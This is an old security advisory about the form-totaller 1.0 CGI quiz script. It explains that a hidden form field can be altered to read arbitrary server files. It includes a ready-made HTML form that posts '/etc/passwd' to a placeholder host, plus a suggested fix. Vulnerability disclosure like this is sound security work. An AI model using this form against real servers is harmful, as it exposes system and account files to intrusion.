form-totaller.txt

`Content-Type: Remote Root via vulnerible CGI software  
Date : 13/08/2000  
Sender : s1gnal_9 <[email protected]>  
Subject : form-totaller Vulnerible CGI  
X-System : UNIX/NT systems running the form-totaller CGI software  
X-Status : s1gnal_9-ADVISORY-form-totaller.txt  
X-Greets : Narr0w, f0bic, VetesGirl  
_________________________________________________________________________________  
  
  
PRODUCT NAME: form-totaller version 1.0  
  
PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/  
Also Available at freecode.com   
  
DESCRIPTION :   
Use "form-totaller" to create tests and quizes on the web.   
Use forms with pull-down menus or radio buttons and this CGI will display   
output based on their input.   
  
PROBLEM:  
The command field "_response_data" is the field that specifies the display output   
based on their input.   
  
The default file for this field is set at:  
<input type="hidden" name="_response_data" value="responses.dat">  
A remote attacker could easily change the cgi script to use "/etc/passwd" as the   
response data value.   
  
  
EXAMPLE:  
Below is a example of how we could read files on the remote system.  
  
<-------------------------CUT HERE-------------------------------------->  
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">  
<input type="hidden" name="_response_top" value="top.html">  
<input type="hidden" name="_response_data" value="/etc/passwd">  
<input type="hidden" name="_response_bottom" value="bottom.html">  
<input type="hidden" name="_divide_by" value="4">  
<input type="submit" value="Click for viewing of the /etc/passwd file.">  
</form>  
<-------------------------CUT HERE-------------------------------------->  
  
  
SOLUTION  
I would recommend hard-coding the response_data file right into the script   
and leave that command field out of the cgi.  
  
  
Please visit www.zone.ee/unix :)  
  
`